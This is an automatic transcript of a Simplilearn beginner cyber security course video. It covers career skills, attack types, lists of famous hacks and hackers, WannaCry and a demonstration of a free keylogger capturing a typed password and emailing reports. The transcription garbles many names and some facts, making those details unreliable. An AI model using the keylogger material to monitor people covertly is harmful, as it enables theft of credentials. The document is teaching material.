#Cyber #Security #Full #Learn #Cyber #Security #Hours #Cyber #Security #Training #Simplilearn
Hey everyone welcome to this informative video on cyber security full course this full course will acquaint you with various cyber security concepts from scratch if you are a beginner in this field not to worry you are at the right place this cyber security tutorial for beginners will guide you through your
Cyber security journey cyber security is gaining popularity more than ever given the current covert 19 scenario and the entire world becoming virtual according to a research study by deep instinct ransomware increased by 435 percent in 2020 compared with 2019. these numbers show that this is likely
To increase in 2021 and in the future this shows how crucial it is to have cyber security to put an end to such cyber attacks now let’s go ahead and get started with our learning journey here we will understand cyber security cyber attacks cryptography and also look into ethical hacking
We’ll begin the cyber security tutorial for beginners course with an interesting introduction to cyber security following which we will have a look at the top five skills that are required for your cyber security career next we will look at the different types of cyber attacks and then understand the
Importance of cyber security and what cyber security is all about moving forward we will look into the concept of ethical hacking along with a hands-on demo for each type of cyber attack next we will acquaint you with the concept of cryptography following this we’ll briefly introduce you to the various cyber security
Certifications available today along with cyber security career prospects the certifications we will be talking about are the comptia security plus certification the ch certification along with the roles and responsibilities of a certified ethical hacker and the world-renowned cissp certification we will then conclude this cybersecurity
Full course with a set of the top 50 cyber security interview questions and answers that can help you crack your cybersecurity interview for this training with me i have an experienced cybersecurity specialist bipin and beverb and together we will take you through the various topics in cyber security cryptography and ethical
Hacking all of this in under 12 hours so let’s start off with an interesting short video on cyber security but before we begin make sure to subscribe to our youtube channel and hit the bell icon to never miss an update from simplylon with just one click you can shop online
Make online bake transfers like a post on instagram and much more as convenient and exciting as it sounds have you ever wondered how unsafe it could be to live in this digital era is our data well protected well no to help us tackle this issue we have cyber security to our rescue
Cyber security is the art of protecting our networks and devices from unauthorized access when i say unauthorized access here it would refer to a small or big cyber attack or a cyber threat there are various types of cyber attacks that you can fall prey to phishing malware attack ddos attack
Password attack and many more a few ways to implement cyber security are defining clear boundaries using network security control devices like firewalls and ids and carrying out security testing at any point in time the cia that is confidentiality integrity and availability are being implemented in an organization to ensure that our
Information is secure there is a great demand for professionals like ethical hackers cisos and many more cyber security experts who can implement cybersecurity and safeguard an organization’s data so what are you waiting for get certified with simplylearn and began your lucrative cybersecurity career this was cyber security in short meet ann
She often shops from www.shoppingcart.com she has her information like email id address and credit card details saved on the website to enable a faster and hassle-free shopping experience the required information is stored in a server one day anne received an email which stated her eligibility for a special discount voucher from shoppingcart.com
In order to receive the coupon code she was asked to fill in her shoppingcart.com account credentials this didn’t seem fishy to her at the time as she thought it was just an account verification step little did she realize the danger she would be facing she was knocked off her feet when a
Substantial amount of money was wiped off her account how do you think this happened well yes the email she received was fake anne’s shoppingcart.com account witnessed unauthorized access from a third party this type of attack is known as a cyber attack and the person who carries it out is called a hacker
Could anna prevented this attack indeed she could have with the help of cyber security cyber security involves techniques that help in securing various digital components networks data and computer systems from unauthorized digital access there are multiple ways to implement cyber security depending on the kind of network you are connected to and the
Type of cyber attacks you are prone to so let’s take a look at the various cyber attacks that anne could have been exposed to one of the most common types of cyber attacks is a malware attack like trojan adware and spyware to name a few had ann downloaded any suspicious
Attachments online her system could have gotten corrupted by certain malicious viruses embedded within the attachments next is a phishing attack the type of cyber attack which ann experienced here the hacker usually sends fraudulent emails which appear to be coming from a legitimate source this is done to install malware or to
Steal sensitive data like credit card information and login credentials another type of attack is the man in the middle attack here the hacker gains access to the information path between ann’s device and the website’s server the hacker’s computer takes over anne’s ip address by doing so the communication
Line between ann and the website is secretly intercepted this commonly happens with unsecured wi-fi networks and also through malware password attack is one of the easiest ways to hack a system here and’s password could have been cracked by using either common passwords or trying all possible alphabetical combinations
To prevent future cyber attacks and sought to implement a few cyber security practices first she installed a firewall as the name suggests it is a virtual wall between anne’s computer and the internet firewalls filter the incoming and outgoing traffic from your device to safeguard your network and they can
Either be software applications or hardware reinforcements secondly and implemented honeypots just like how flowers attract bees dummy computer systems called honeypots are used to attract attackers these systems are made to look vulnerable in order to deceive attackers and this in turn defends the real system in addition to these she also decided to
Use unique alphanumeric passwords antivirus software and started avoiding mails from unknown senders that was ann’s story cyber attacks are not just confined to individuals but also to public and private organizations the cyber attacks carried out in such places are more deadly and they result in colossal losses motives of such attacks are many
Starting from tampering with crucial data to monetary gains let’s have a look at a few of the cyber attacks that companies are subjected to various public sector organizations and large corporations face the advanced persistent threat apt in this form of attack hackers gain access to networks for a prolonged
Period in order to continuously gain confidential information companies also witness the denial of service attack where networks are flooded with traffic which in turn leaves legitimate service requests unattended a variant of this is the distributed denial of service ddos attack when multiple systems are used to launch the attack
When a hacker manipulates a standard sql query in a database driven website it is known as a sql injection attack by doing so hackers can view edit and delete tables from databases amidst a plethora of cyber attacks it is indeed a challenge for organizations with several networks and servers to ensure complete security
This is not an easy task and to help with this cyber security professionals are hired to work on identifying cyber threats and securing a company’s network there are multiple job roles in the field of cyber security if hacking fascinates you then the role of an ethical hacker is something to be explored
Such professionals try to a network’s vulnerabilities just like how a hacker would do but only to identify those vulnerabilities and resolve them for protection against an actual cyber attack but if you are looking to design robust security structures then the role of a security architect is more apt a chief information security officer
Ciso plays a crucial role in enterprise security and is entrusted with the overall safety of the information in an organization with the increase in the production of global digital data it is anticipated that cyber attacks will quadruple in the near future organizations are going to need cyber security professionals who can prevent
These attacks a career in the field of cyber security is lucrative and a very smart decision for professionals now so what are you waiting for get certified with simply learn and become a cyber security expert with businesses moving online and shifting to cloud storage currently the
Demand for cyber security is at its peak with that comes a high demand for cyber security experts who can safeguard digital data according to cyber crime magazine by cyber security ventures globally there would be nearly 3.5 million unfilled cyber security jobs by 2021 and the number of internet users will hit a
Whopping 6 billion by 2022 these numbers speak volumes and this shows the growing demand for cyber security professionals across the globe now that you know the high demand for cyber security professionals let us help you start your cyber security career by bagging the right skill set
Many of you out there might be waiting to become a cyber security professional but are unsure of how to go about it and what skills you would need to get a cyber security job not to worry we are here to help you with that after extensive research we
Have come up with the top five skills that will help you get into the field of cyber security let’s have a look at these skills individually first we have networking and system administration the number one skill you need to have to enter the field of cyber security is computer networking
Networking is the backbone of the internet it is imperative that you have an in-depth understanding of networking to start a career in cyber security a network is a group of interconnected devices and networking is the art of understanding how data is sent transmitted and received amongst these devices
You need to know various routing protocols the tcp and osi models govern networking the osi model is comparatively newer basically in these models all the protocols are grouped into layers and work together to help you receive data on your device sent from a server learning networking will help you
Understand the technical aspects of data transmission which will help you secure your data you can take up networking certifications like security plus and cisco ccna to gain a strong networking foundation another skill that will be beneficial for you is to master system administration if you think about it all of us are
Sysadmins at some level system administration is all about configuring and maintaining computers you must be curious to know every aspect of your computer features and settings and play around a bit carry out a trial and error method and give yourself small tasks like recovering deleted files or monitoring
Old viruses on a vm explore new techniques put them into use and expand your knowledge let us now move on to our second skill knowledge of operating systems and virtual machines to become a cyber security professional you need to have a strong knowledge of operating environments such as windows linux and mac os
Cyber security professionals largely use linux and it comes with several tools to learn operating systems go ahead and set up and use virtual machines that is vms and play around with them this will help you gain hands-on experience as a cyber security expert you should be comfortable working on any os
Vms allow you to train and research in an isolated environment and help you maximize your skills the next point to remember is to know kali linux it is the most widely known linux distribution for ethical hacking and penetration testing it comes with several hundred tools related to penetration testing malware
Analysis security research computer forensics and so on kali contains several projects and you can learn a lot another good thing about kali is that it is free to use so what are you waiting for download and start right away remember that linux is the backbone of cyber security and a commonly asked
Topic for cyber security interviews especially for pen testing roles moving on to our third skill our third skill is network security control it is another basic skill that every cyber security professional should have network security control refers to the different measures which are employed to enhance the security of a network
It is simple you can only safeguard your network if you know how it works how routers firewalls and other devices work a firewall is a hardware or software that blocks incoming or outgoing traffic from the internet to your computer firewalls are required to secure a network as a cyber security expert you
Must be able to leverage a firewall to filter and prevent unauthorized traffic onto the network in addition to that as a cyber security expert you must know about intrusion detection systems intrusion prevention systems virtual private networks and remote access an intrusion detection system ids is designed to detect unauthorized access to a system
It is used together with a firewall and a router you should be able to operate the ids and recognize any security policy violations and malicious traffic on the network as many of you may have used a vpn is a connection between a vpn server and a
Vpn client it is a secure tunnel across the internet moving on next up we have an interesting skill any idea what that is if yes pause and leave a comment as to what you think the next skill will be if getting your learning started is half
The battle what if you could do that for free visit skill up by simply learn click on the link in the description to know more and before we jump into this skill if you find this video interesting make sure to give it a thumbs up fourth skill on our list is coding
So you might be wondering if coding is really required to become a cyber security professional well it is true that not all cyber security professionals have or need coding skills however having zero coding knowledge may limit your opportunities in the future knowing a couple of programming languages will help you identify the
Plan behind an attack and defend against deadly hacking techniques so as seen on your screens these are the best programming languages to learn to make your cybersecurity career worthwhile we have c and c plus the c programming language is the backbone of most operating systems c and c plus are low
Level programming languages that you need to know as a cyber security professional on the other hand python is a high level programming language that is becoming popular among cyber security experts today knowing python will give you an upper hand in your career it will help you identify and fix vulnerabilities
Javascript is another high level programming language that adds interactivity to web pages a good advantage of knowing javascript is that you can prevent cross-site scripting attacks from occurring as in these attacks the attacker implants malicious code in a web application speaking of php because most of the websites are created using php learning
It will help you defend against intruders similarly html is another language cyber security professionals should understand as most websites use it and it is one of the easiest languages to learn another programming language that you can use is golang it is great for cryptography you can solve various cyber security problems with it
Then we have sql that is structured query language attackers use this language to damage the stored data one such example is the sql injection attack hence having a good understanding of sql will be highly beneficial another point we’d like to highlight is to have knowledge of assembly language
This will help you become a cyber security engineer assembly will help you understand how malware functions and thereby help you defend against it in the cybersecurity domain you can’t just lock into a single language and hence it is advised that you’re acquainted with a couple of them
You can also do a crash course for these languages and learn them hence determine the best programming language for your cyber security role and get familiar with the basics moving on our fifth skill on the list is cloud security there is a growing demand for cyber security professionals with cloud
Security skills in the coming years companies are on the lookout for professionals with security skills applicable to public and hybrid cloud platforms such as amazon web services and azure more organizations look to cloud infrastructure to store data and run applications this includes the implementation of policies and technologies that protect
Cloud-based systems and devices just like application development security cloud security also involves building secure systems from the start companies want professionals who can manage the cloud security tools to identify and prevent any cloud breaches people with experience and knowledge in managing big platforms such as microsoft
Azure aws and the gcp are in high demand now that we have seen the top 5 cyber security skills let us go through a set of additional skills that can help you get into the cyber security field remember that to become a successful cyber security expert you must possess a
Rich and diverse skill set so in a list of additional skills first we have risk analysis identifying risks even before their arrival is a great skill cyber security professionals are required to identify manage and mitigate risks risk management and mitigation is a skill set that is going to be highly in
Demand in the coming years next we have information security companies require skilled professionals who can protect their electronic data from unauthorized access here in-demand skills are authentication authorization malware analysis and data recovery next on our list is security incident handling and response as a cyber security expert you must be
Prepared to handle any forthcoming threat of violating an organization security policy by following an updated incident response plan your team can proactively protect your data and minimize the damages in security incident management you are required to identify manage record and analyze security threats in real time a security incident can be an active
Threat or a successful compromise of data or an attempted intrusion it can also be incidents like ddos attacks phishing apts ransomware and many more another important pointer is that as a security practitioner you must also manage and analyze the security information and event management siem tools and services
Moving on we have security audit security auditing is an internal check that is carried out to find flaws in the organization’s information system you must be able to conduct a review of the organization’s adherence to regulatory guidelines security audit and compliance knowledge are very crucial as any mistake of
Regulatory compliance could lead to hefty penalties soon organizations will need people who are more familiar with the various data privacy regulations if you are good at paperwork you can capitalize on this skill companies will need people who can understand what paperwork to file and which security protocols to use to
Comply with the regulations finally we have loss and regulations and often overlooked cybersecurity aspect there are several cybersecurity laws and regulations and if you break these laws intentionally or not it doesn’t matter as you will still be charged these laws define how you can use the internet and
It also defines how people can be protected from becoming the victims of cyber crimes knowing these laws and regulations and following the best practice will make you ethical at your job and this will in turn be good for your organization so those were our list of additional skills
Apart from these make sure you stay updated with new hacks and learn new tools as cyber security is ever evolving another important skill apart from these technical skills is your soft skills having a set of good soft skills will help you bag your dream job we have a
Video on the top 5 soft skills that will help you grow in your career do watch that and incorporate those skills as well we bring you the top 10 computer hacks of all time let’s see what we have at number 10. from april 27 2007 estonia the european
Country faced a series of cyber attacks that lasted for weeks this happened when the estonian government decided to move the bronze soldier from thailand center to a less prominent military cemetery located on the city’s outskirts unprecedented levels of internet traffic took down estonian banks online services media outlets broadcasters and government bodies
Botnets sent massive waves of spam and vast amounts of automated online requests according to researchers the public faced ddos attacks there were conflicts to edit the english language version of the bronze soldier’s wikipedia page as well although there is no confirmation russia is believed to be behind these cyber
Attacks that largely crippled the estonian society let’s now move on to the next attack on december 23 2015 several parts of ukraine witnessed a power outage and this was not a typical blackout it was indeed the result of a cyber attack information systems of three energy distribution companies in ukraine were
Compromised it is the first known victorious cyber attack on a power grid it is said that here hackers sent out phishing emails to the power companies 30 substations were switched off and about 230 000 people were left in the dark for about one to six hours u.s investigators believed that russia-based
Hackers were responsible for this experts have warned that other countries could also be vulnerable to such attacks let’s see what we have at number eight in the year 1999 a cyber attack caused a 21 day shutdown of nasa computers unbelievable isn’t it the hacker was none other than the then 15 year old
Jonathan james he first penetrated u.s department of defense divisions computers and installed a back door on its servers this allowed him to intercept more than a thousand government emails including the ones containing usernames and passwords this helped james steal a piece of nasa software and cracked the nasa computers
That support the international space station which cost the space exploration agencies forty one thousand dollars as systems were shut down for three weeks he was the first person to carry out a computer hack against the american space agency let’s now move on to the next attack
In late november 2014 there was a leak of confidential data from the film studio of sony pictures information about sony pictures employees their emails copies of the then unreleased sony films future propositions and other crucial data were leaked this cyber attack was carried out by a hacker group named guardians of peace so
What did the hackers want well they demanded that sony withdraw its then upcoming movie the interview this movie was a comedy story line to assassinate the north korean leader kim jong-un sony then decided to cancel the film’s theatrical release due to the threats at cinema screening the movie
It is indeed hard to trace the roots of a cyber attack in this case after evaluation the u.s intelligence officials arrived at the theory that the attack was in a way related to the government of north korea however north korea had denied the same moving on to our number six
In december 2006 tjx the u.s retailer company identified that 45.6 million debit and credit card details were stolen this happened from one of its systems over 18 months by an unknown number of intruders it was one of the first largest ever cyber attacks involving the loss of personal data
As a result banks in the affected regions had to reissue and block thousands of payment cards a group of hackers did this albert gonzalez being the mastermind the group was from miami the place where the tjx heist was believed to have originated reports said that the tjx data breach
Occurred because of weak web encryption at two of its marshall stores in miami next moving on to our top five let us see what we have at number five the year 2010 witnessed the discovery of the deadly computer worm stuxnet this malware’s motive was unlike any other usual cyber attacks it aimed at
Destructing the equipment the computers controlled stuxnet came with the deadly purpose of damaging iran’s nuclear infrastructure it infected more than 200 000 computers including 14 industrial sites and a uranium enrichment plant in iran stuxnet initially spread via microsoft windows and targeted siemens industrial control systems although it was discovered only in 2010
It is believed to have been silently sabotaging iran’s nuclear facilities it was one of the first discovered malware that was capable of hampering hardware systems it largely damaged the centrifuge of the iranian reactors this was believed to be a cyber weapon created by the us and the israeli intelligence although there is no
Documented evidence or acceptance by either of the countries for the same moving on to number four in the year 2014 home depot was the victim of one of the deadliest cyber attacks 56 million payment cards were compromised along with 53 million customer email addresses stolen this security breach happened from april
To september 2014. criminals were believed to have used a third-party vendor’s username and password to enter the perimeter of home depos network the attackers were then able to deploy custom built malware on its self-checkout systems in the us and canada moving on to our top three as you might
Be aware the playstation gaming system is one of sony’s most popular products unfortunately in april 2011 sony executives witnessed abnormal activity on the playstation network this resulted in the compromise of approximately 77 million playstation users accounts and prevented users of playstation 3 and playstation portable consoles from accessing this service
This forced sony to turn off the playstation network on april 20th on may 4th sony confirmed that personally identifiable information from each of the 77 million accounts had been exposed the outage lasted for 23 days sony released almost daily announcements concerning the system outage in the end sony is believed to have invested
Approximately 170 million dollars to improve the network security to investigate the attack and to cover the expenses of caring for the consumers that had been affected let’s now move on to the next attack at number two in may 2017 one of the most dangerous cyber attacks took place
It was known as the wannacry ransomware attack caused by the wannacry crypto worm the victims were the users that used the unsupported version of microsoft windows and those who hadn’t installed the new security update this did not take place through phishing like other attacks but through an exposed vulnerable smb port the attack
Originated in asia and then eventually spread across the globe in a day more than 200 000 computers were infected across 150 countries the wannacry crypto worm locked the users out of the targeted systems and encrypted their data the users were asked for a ransom of 300 to 600 which
Had to be paid via bitcoin in exchange for their data this attack took a toll on both private and government organizations it resulted in damages from hundreds of millions to billions of dollars in a matter of few days the emergency patches released by microsoft halted the attack also the discovery of a kill
Switch prevented the infected computers from spreading the crypto worm security experts in a few countries believed that north korea was behind this attack and finally let’s see what we have at number one more than two decades ago in march 1999 the melissa virus a mass mailing macro virus was released
It targeted microsoft word and outlook based systems and created considerable network traffic melissa virus infected computers via emails the email would look like an important message well yes it was fake if the recipient opens the attachments in the mail and downloads the document and then opens it with microsoft word a
Virus was released on their computers this would then mass mail itself to the first 50 people in the victims contact list and then disable multiple safeguard features on microsoft word and microsoft outlook this began spreading like a wildfire across the internet david l smith released the virus the virus
Caused nearly 80 million worth of damages it did not steal data or money however it caused a havoc almost 1 million email accounts were disrupted worldwide agencies were overloaded and some had to be shut down entirely and internet traffic in some locations were slowed down do you agree with our list
If you’re aware of any other great interesting computer hacks in history do let us know in the comment section below according to cyber security ventures the global cyber crime cost is expected to grow and reach 10.5 trillion us dollars by 2025. that’s the cost we have to pay for cybercrimes
At number 10 we have johnson james and cheddar in the year 2006 charleston james anchetta of towney california was charged for controlling huge number of botnets in other words hijacked computers this was the first time that a hacker who was sent to prison for the use of botnet technology antshudai used botnets
To compromise more than 400 000 computers advertising companies paid him to install adware or bots on specified systems it is also noted that ancieta advertised the sale of his spotnets to those interested in sending spam or launching ddos attacks without being identified he was also pleaded guilty for infecting
Machines at two u.s military sites which earned him more than sixty one thousand dollars johnson james angela was captured in a well-planned and elaborate sting operation when fbi agents coaxed him in their office on the pretext of collecting computer equipment he was sentenced to nearly 60 months of
Imprisonment and was ordered to pay 15 000 us dollars to the u.s federal government for hacking their military computers at number nine we have andren lammer lamo began his hacking journey by hacking games he was more likely a grey hat hacker who wanted people to understand the importance of internet security
However it went far ahead when he hacked the new york times internet in 2002 he was called the homeless hacker for his transient lifestyle and he often had no fixed address he used to hack top-notch accounts by sitting in cafeterias libraries and so on he was convicted for
Compromising security at the new york times microsoft and yahoo to name a few he later gained the batch of an american threat analyst he also appeared on good morning america fox news democracy now etc as an expert on net centric crime and incidents laumo died in the year
2018 at the age of 37. at number eight we have kevin paulsen a former american black hat hack up in the hacker community he is better known as dark dante at the age of 17 he hacked the us department of defense but he was left
With a warning as he was a minor later in 1990 he propelled to stardom for infiltrating a radio show calling contest and guaranteeing that he will be the 102nd caller to win the brand new porsche 944s 2. the fbi stated perceiving paulson and was soon arrested and sentenced to a five years of
Imprisonment he was also barred from using a computer or internet for three years post his release later he took into white hat hacking and journalism in the year 2005 he became a senior editor of wired news at number 7 we have the famous american hacker jonathan james better known as comrade
He was the first juvenile in the united states to be sent to prison for hacking this famous hack was his intrusion into the defense threat reduction agency or dtra computers a division of the united states department of defense he installed a back door on its servers this enabled him to access over 3000
Messages from government employees various user names passwords and other confidential data this helped james steal a piece of nasa software and this forced nasa to shut down computers for three weeks to fix the issue at an estimated cost of 41 000 american dollars he was sentenced to six months arrest in
He carried out his hacking using the alias comrade he specialized in hacking high profile garment systems however he had a bitter ending in 2008 moving on to a hacker at number six at number six we have anonymous the anonymous group is an international decentralized hacktivist movement that
Is widely known for its cyber attacks against several governments its agencies and the church of scientology this group is focused on the concept of social justice the members of this group known as anons are recognized in public by wearing guy fox masks however some members cover their face
Without using the well-known masks as well they are known as being the digital robin hood amongst its supporters one of the noted incidents was in the year 2008 when the group took up issue with the church of scientology and began to disable their websites they are also
Known for hacking vatican the fbi paypal sony the cia mastercard visa the israeli chinese tunisian and ugandan governments while the law enforcement agencies and fbi have tracked down a few of the group’s members the lack of any proper hierarchy makes it almost impossible to distinguish or eliminate the anonymous
Groups as the whole at number five we have the british du mathu baven and richard price in 1994 the do hacked into multiple u.s military systems including the defense information system agency griffis air force base and the korean atomic research institute they infiltrated into foreign systems by transferring critical
Data of korean automatic research institute into the united states air force system in 1996 bavin was arrested for hacking incidents related to u.s air force defense manufacturer lockheed nasa and nato the pentagon described beaven as the number one threat to u.s security and possibly the single biggest threat to
World peace since adolf hitler however weaven claims he was looking to prove a ufo conspiracy theory in 1997 price was fined 1200 pounds after pleading guilty to 12 offenses of gaining unauthorized access to computer systems in march and april 1994 having malicious purposes or not baven and price displayed that even
Military networks are vulnerable now moving on to our hacker at number 4. at number 4 we have astra this hacker is a tad bit different from the others on this list as he has never been publicly identified the pen name of this hacker astra is a sanskrit word for
A weapon in 2008 it was reported that the authorities apprehended him at that time he was known as a 58 year old greek mathematician he had into france’s dissolve group systems and got his hands on vulnerable weapons technology data and then sold it to different countries
For a long period astra was reported to have sold the data to nearly 250 people from across the world this in turn caused dissolved 360 million us dollars of damage while the astra’s real identity was never discovered officials have said that he had been wanted since the year 2002.
At number three we have the famous american computer hacker albert gonzalez he was responsible for carrying out multiple hacks he is accused of masterminding the biggest fraud in history that is the combined credit card theft and reselling of nearly 170 million car and atm numbers from the
Year 2005 to 2007. this shows how unsafe internet banking can be at times this was recorded to be one of the biggest credit card thefts in history he carried out this by installing a sniffer albert gonzalez is also said to have been the mastermind of the tjx companies hack wherein 45.6
Million debit and credit numbers were stolen later in 2010 he was sentenced to 20-year in federal prison moving on to a hacker at number two at number two we have gary mckinson he is a scottish systems administrator and hacker accused of carrying out the biggest military
Computer hack of all time in 2002 he identified himself as solo through an odd message on a u.s army computer it was later found to be gary mckinson he was accused of infiltrating 97 united states military and nasa computers by installing virus and deleting a few files over 13 months between february
2001 and march 2002. this was the biggest military computer attack of all time they shut down the us military’s washington network for 24 hours what is fascinating is his reason that much of his hacking was in search of information on ufos that he believed the us government was hiding in its military
Computers and finally let’s see who we have at number one at number one we have kevin mitnick the now affluent american entrepreneur was one of the most wanted cyber criminal of us once upon a time kevin who is currently a security consultant was once convicted of hacking motorola nokia and pentagon kevin
Mastered computer hacking and social engineering early and got his start as a team in 1982 he hacked north american defense command this achievement inspired the 1983 film war games in 1989 he hacked digital equipment corporations network and made copies of their software it’s largely believed that he once obtained full control of pacific
Bell’s network to merely prove that it could be done he never exploited the data he obtained according to reports midnight gained unauthorized access to a dozens of computer networks while he was a fugitive after five years of imprisonment mitnick started afresh and became a security consultant his knack
With computers is still remembered all of these hackers were unbelievably skilled in cyber code few of them faced jail in time a few of others ever since put their cyber skills to better use by becoming security advices and helping humankind hacking skills aren’t a form of criminal behavior if it is put to
Good use where organizations have faced cyber crimes in the recent past the different types of cyber attacks the reasons for these cyber attacks and then we are going to dwelve into what exactly cyber security what is expected out of us as cyber security experts to provide
As a cyber security solution then we are going to look at some basic network terminologies which will help us understand cyber security and some of the terms that are utilized by experts when we deal with cyber security the goals that we want to achieve when i say
I want to be secure what exactly do i mean when i want to secure an organization what kind of security parameters are we looking at then we are going to look at different ways of tackling cyber crime in today’s world and lastly we’ve got a very interesting
Demo on metasploit where we are going to test a vulnerable machine and try to hack it now metasploit is a penetration testing tool widely used by security experts and hackers to test and try to penetrate different systems so we have a very good demo on that and we’ll be
Looking at that at the end of this particular video let’s begin with the rise in cyber crimes so let’s talk about wannacry this is something that happened way back in 2017 let’s not say way back it’s just 2019 two years back and it took the world by stop so it was a cyber
Attack which encrypted the data of organizations and then the hackers held that organization ransom by asking of rather demanding money from them to decrypt their own data so what exactly happened the attack originated in asia and then spread across the rest of the world note the date and how did this
Happen there was a vulnerability that was identified in microsoft windows the smb vulnerability smb which is server message block is essentially the file sharing and the printer sharing services that you use in a lan environment on windows operating system by default these are enabled on your desktops and
There is a hardening guide that uh people utilize to to either upgrade the version of smb to a more secure version or to disable smb and utilize something else now this was a known vulnerability and this was targeted within days more than 230 000 computers when infected across 150
Countries now when we say this was identified microsoft knew of this vulnerability and in fact they had released a patch in april of 2017 to mitigate this vulnerability within two months of that release this attack had happened now in a real-world scenario it is not possible for all the servers and
Devices to be upgraded to the latest patch level because organizations need to test those patches to see if those patches are going to interfere with the services that they are providing and hence no organization will be completely patched up at any point in time and this
Was the flaw that sadly took down a lot of organizations the patch was available but it wasn’t testing somewhere not utilizing it yet and they did not see it as a high value risk and suddenly something happened and wannacry took place now what happened was a crypto worm called wannacry which basically
Encrypts the data and locks the user out of their own computers and they get a screen in front of them which says you your data has been encrypted and it gives them a link and they are they demand uh 300 to 600 dollars to be paid to the hackers to retrieve the
Decryption key for their data now here obviously you’re not going to pay cash to hackers neither are you going to make a bank transfer because both of the ways you can identify the hackers and then pursue them so the hackers demanded this exchange via bitcoins cryptocurrency
This is the best way to remain anonymous and the best way to make payments over the internet without being identified so what was the impact of the attack around 200 000 to 300 thousand computers were infected now it sounds like a small number of computers when you’re talking
About global however the services that it affected were huge in uk the national health service got affected all the databases got encrypted surgeries and treatments of patients were postponed fedex renault nissan all of these organizations got compromised and the production lines basically shut down for a few days till they retrieved data from
Backup started to restore and then tried to bring back everything to normal then in february 2019 dunkin donuts announced that the users of their reward programs were targeted by a credential surfing attack that means that the attackers stole the credentials usernames and passwords of customers of dunkin donuts
Now we think dunkin donuts they sell donuts how much could it impact anyone but if you have an online account with dunkin donuts you also have your personal identifiable information stored in those accounts for example your name address credit card information maybe your social security number or your national insurance card or something
Like that which can lead to identity theft people can misuse that information pretend to be you and then take out loans or do transactions in your name where you are going to end up paying those bills so stealing of such kind of data is going to impact all the users
Adversely so the first name last name and email ids were stolen that is still good enough to launch social engineering attacks and target these victims to phishing attacks or similar attacks so now let’s look at the different types of attacks in cyber so we are going to
Discuss these six malwares we are going to talk about social engineering attacks man-in-the-middle attacks denial of service sql injections and password attacks now if you look at this malwares basically target hosts operating systems social engineering attacks would address or attack the gullibility of a human being with the help of a computer for
Example sending a fake mail or hosting a fake website man in the middle attack would target a network and then try to capture data packets within the network thus compromising your credentials a denial of service attack would crash a service sql injection attacks would attack an application and a password
Attack would attack the usernames and passwords of accounts thus taking advantage of weak passwords and getting access to your accounts so let’s start with malware malware basically refers to malicious software the first part of malicious mal and the where out of software becomes malware malwares are nothing but vehicles in which hackers
Embed payloads payloads could be viruses worms ransomwares trojans so they hide these kind of malicious softwares within legitimate looking softwares and they post them on the internet people who are interested in those kind of softwares will obviously download them and since they are looking very legitimate they will try to install them thus
Accidentally and unknowingly installing a trojan virus or a ransomware on their machine now most of us have done this at one point in time where we have looked at pirated software because we did not want to pay for it and then we we probably go to torrents and then search
For those softwares download them and there’s a keygen.exe over there which we have to execute and then we have to copy that code the exe file that comes out or with the keygen and then we have to replace it and i mean it’s a very convoluted process but the fact that you
Have to restore some code with some other code would basically mean that there is something wrong with that file so 99 percent of the time these programs would have viruses or trojans embedded within them and it is going to affect the security posture of your computers if you scan keygen.exe with any
Antivirus across the globe they will always report them as malwares and they will probably want to delete those kind of files so how do these get infected it gets infected into a system when the user clicks on a suspicious link now obviously if you think it is a
Suspicious link you’re not going to click on it but you press the link or you’re compelled to click on it just out of curiosity let’s say you click on that link there’s a redirector it downloads an attachment from a malicious server and it gets installed on your machine
Most of the common ways a virus or a worm is spread is through usb devices people pass around usb devices like nobody’s business and you have no idea where the device has been used before and you plug into your machine and if there is a virus on that usb device it
Will get infected on your machine as well malwares are nothing but malicious softwares that pose as legitimate softwares but will have a virus trojan or a worm embedded within it right it could also be a keylogger a keylogger is nothing but another software that is created to catch all the keystrokes that
The user is making create a copy of it and store hacker so whatever the user is typing it will now be known to the hacker it could be bank details passwords any personal information that the user might want to keep secret we are going to look at three different
Demos here this demo is just to showcase a couple of things uh we’re going to look at a keylogger how a keylogger works this virtual machine here and i’ve already downloaded a keylogger and installed it the idea of this demo is to showcase how a keylogger functions right
So you can see online on the screen we are using a free keylogger.en.softony.com here on this site and you can download the free keylogger right from here what i’ve done using my demos is that i’ve always have a keylogger running in the background to capture all the keystrokes that i’ve
Been doing whenever i’m doing any demos so this keylogger here can actually be hidden in the taskbar but for our demo purposes have kept it visible when you click on it it will open up and give you a basic screen where you can start navigating about the keylogger now you
Can see that on 8th which is today it already shows some keystrokes applications and some visited websites as you can see already been browsing using the browser over here and which has been recorded by the keylogger in the background and just to give you an
Example if i click on this file you will see all the keystrokes that i have been doing so far and you can see i’ve gone to this i’ve opened up my mozilla firefox i’ve typed in a key search keyword of free key logger then i’ve gone on to the website how secure is
Mypassword.net in which i may have tried out a few passwords myself and then i’ve gone and copy pasted this url into the browser window and you can see all of this has been recorded and just to emphasize on that let’s go on to another website and let’s say let’s go to facebook.com
I’m not actually going to log in i’m just going to type in a random username so someone at simplylearn.com and a password like asd rate1234 and i’m going to try to log in obviously the login is going to fail because this account doesn’t exist but we want to see
What happens in the background when the keylogger picks up the keystrokes that we have typed so let’s open up the keylogger again and go and see what is there in the keystrokes and clipboard and you can see over here that we typed in facebook.com enter and then we did
Not type in the username that’s the difference here we selected it from a drop down so a keystroke logger or keylogger has not been able to capture that input a keylogger in its essence is only records something that has been typed in by the user real time since we
Did not type in the username it did not record that username but we typed in the password and you can see the password over here asd at the rate one two three four and this is how a keylogger works it only captures the keystrokes that
Have been typed in real time so if we use this exercise on our victims and they’re just using drop down menus at that point in time none of the data is going to be recorded for that activity you would need something which is known as spyware which would capture screens
Which should capture all of this information that is going on now apart from just logging keystrokes what this software also does is it also has a list of used applications you can see all the applications that have uh booted up along with the operating system and the
Ones that have started up after the operating system has booted it also has a list of the visited website so you can see these are the websites that we have been visiting and uh they have been listed right here the last one being facebook login or sign up right so this
Can store history for a really long time if i go back in time and if i look at some of the demos that i’ve been looking at so on 14th of september these were the keystrokes that i utilized when i was doing some trainings while i was providing some
Demos on other topics so a keystroke or a keylogger will store all that information and keep on recording it till you actually delete that data or you can you can reset the keylogger you can also set up the keylogger to send the email to you on the deal as a daily
Report to a particular email address that you’ve sent so as long as it detects the internet connectivity this key logger will send you an email to the email address that you have specified with all the keystrokes that it has locked now this is the free version
There’s again a paid version for it so you can go and visit this site and see how this keylogger functions if i press on the x button over here it will ask me if i want this to be hidden in the system tray if i click on yes it only
Using this shortcut will i be able to invoke this screen so just for demo purposes i do not want this to be hidden so i’m going to click on no and you can see that the keylogger is still visible over here so that was the first demo
That we are seeing viruses as we all know are destructive programs that once executed would destroy data or harm the hard disk or the partition tables worms on the other hand would be softwares that would be more of a nuisance value where they’re going to replicate
